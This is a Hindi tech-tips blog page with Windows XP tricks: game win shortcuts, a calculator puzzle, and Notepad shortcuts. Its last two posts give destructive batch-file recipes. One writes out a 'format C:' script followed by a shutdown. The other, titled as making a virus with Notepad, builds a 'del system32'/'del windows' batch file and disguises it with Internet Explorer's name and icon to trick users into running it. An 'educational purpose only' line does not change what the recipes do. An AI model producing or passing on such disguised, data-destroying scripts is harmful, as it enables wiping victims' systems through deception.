Hindi Tech Blog

नोटपेड ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं
नोटपेड ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं

05 मई 2013

विंडो एक्स पी (win xp) कि कुछ मजेदार ट्रिक



आज रविवार है तो कुछ मनोरंजन वाली ट्रिक हो जाये।

ट्रिक न. 1
------------

विंडोज XP के गेम Solitaire का सीक्रेट फंडा अभी ट्राई करे।

स्टर्ट मेनू से आल प्रोग्राम में जाएँ।
फिर गेम्स मे से Solitaire ओपन करे।
अब Alt + Shift + 2 बटन प्रेस करें आप बिना खेले ही जीत जाओगे..


ट्रिक न. 2
--------
---

विंडोज XP के गेम FreeCell का सीक्रेट फंडा अभी ट्राई करे।
स्टर्ट मेनू से आल प्रोग्राम में जाएँ
फिर गेम्स मे से FreeCell ओपन करे

अब Ctrl + Shift + F10 बटन प्रेस करें अब यहाँ से Abort पे क्लिक करें।
फिर किसी एक कार्ड को मूव करके देखो, किसी सही जगह पर ....
आप बिना खेले ही जीत जाओगे..

ट्रिक न. 3
--------
----
क्या माइक्रोसॉफ्ट एक्स पी विंडो का केलकुलेटर यहाँ फेल हो गया
अभी ट्राई करे...
जाएँ Start-->Run-->type Calc

और नीचे दी गई वेल्यु चेक कीजिये

2704/50 = 54.08 सही जवाब मिलेगा।
2704/51 = 53.01960784 सही जवाब मिलेगा।
2704/52 = यहाँ फेल है, आपको यहाँ जवाब नहीं मिलगा।
2704/53 = 51.01886792 सही जवाब मिलेगा।
2704/54 = 50.07407407 सही जवाब मिलेगा।

Microsoft Calculator Failed

ट्राई करके देखो अभी........

कुछ समझ आया क्या.???
2704, 52 का स्क्वायर (square) है तो 2704/52 करने पर रिजल्ट 52 ही आयेगा और आपको लगेगा कि कैलकुलेटर काम नहीं कर रहा है…।


ट्रिक न. 4
----------
एक क्लिक में समय और तिथि

नोटपैड या टेक्स्ट फाइल पर काम करते समय F5 'की' दबाकर जहाँ भी आवश्यकता हो,
तात्कालिक समय और तिथि टंकित की जा सकती है।


अगर आपको ये ब्लॉग पसंद आ रहा है तो अभी इसके सदस्य बने और ब्लॉग का फेसबुक फेन पेज भी लाइक करें.. धन्यवाद..

31 जनवरी 2012

एक क्लिक में समय और तिथि



मित्रों कई बार नोट लिखते समय समय और तिथि बार-बार लिखनी पडती है तो आप नोटपैड या टेक्स्ट फाइल पर काम करते समय F5 'की' दबाकर जहाँ भी आवश्यकता हो,
तात्कालिक समय और तिथि टंकित की जा सकती है।

बस एक छोटी सी ट्रिक से सारा समाधान हो जायेगा।

बड़ा टेक्स्ट एक साथ सेलेक्ट करने के लिये

select all text one click

मित्रों कई बार बड़े टेक्स्ट या पूरी लाइन को सेलेक्ट करने के लिए माउस से पुरे वाक्य को सिलेक्ट करना पड़ता है लेकिन इसका एक आसान तरीका ये है की किसी भी टैक्स्ट एडिटर में बड़ा टेक्स्ट एक साथ सेलेक्ट करने के लिये टैक्स्ट के प्रारंभ में एक क्लिक करें और फिर शिफ्ट दबाकर अंत में एक बार क्लिक करें।

इससे टेक्स्ट को आसानी से सेलेक्ट किया जा सकता है।

आज बस इतना ही मिलते है अगली बार नए विषय के साथ।

30 जनवरी 2012

फोर्मेट करने का बढ़िया तरीका




जेसे हमें c:// पार्टीशियन को फोर्मेट करना हो तो निम्न कदम अपनाएँ

1. नोटपेड खोले
2. फिर लिखें
@echo off
start
start
start
start
start
start
start
format C:
shutdown -p
echo

3. और फिर सेव आल  फ़ाइल करें format.bat नाम से।
५. अब इस फ़ाइल पे क्लिक करे फोर्मेट शुरू हो जाएगा।
इस तरह जिस किसी पार्टीशियन को फोर्मेट करना हो ये तरीका अपना सकते हैं।
ये तरीका विंडो xp के लिए है।

नोटपेड के माध्यम से बनाईये वायरस



१. नोटपेड खोलिए और लिखें "del system32"
२. फिर एंटर बटन दबाए और लिखें "del windows"
३. इस फाइल को सेव करें save as tpye all files में virus.bat के नाम से।
४. इसे रिनेम कर लिखें Internet Explorer
५. फिर फाइल को राइट क्लिक करें और प्रोपर्टी में जाएँ।
६. फिर Change icon पे क्लिक करे और Internet Explorer का आइकॉन सेट करें।
७. आपका वायरस तेयार है।


जब भी इस फ़ाइल पे डबल क्लीक करेंगे तो ये del system32 को डीलीट कर देगा।


Note: This post is for EDUCATIONAL purpose only, what you do with it is your own responsibilities.
loading...